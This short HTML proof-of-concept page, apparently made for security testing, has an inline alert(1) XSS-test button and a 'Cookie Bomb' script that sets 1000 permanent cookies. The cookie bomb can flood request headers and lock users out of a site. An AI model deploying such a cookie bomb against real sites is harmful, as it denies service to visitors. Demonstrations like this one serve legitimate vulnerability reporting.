<html>

<head>
  <title>PoC by e1abrador</title>
</head>

<body>
  <h1>PoC by e1abrador</h1>

  <button onclick=alert(1)>Show XSS Payload</button>
  <button onclick="cookieBomb()">Cookie Bomb</button>

  <script>
    function cookieBomb() {
      for (var i = 0; i < 1000; i++) {
        document.cookie = "cookie" + i + "=value; expires=Fri, 31 Dec 9999 23:59:59 GMT";
      }
    }
  </script>
</body>

</html>
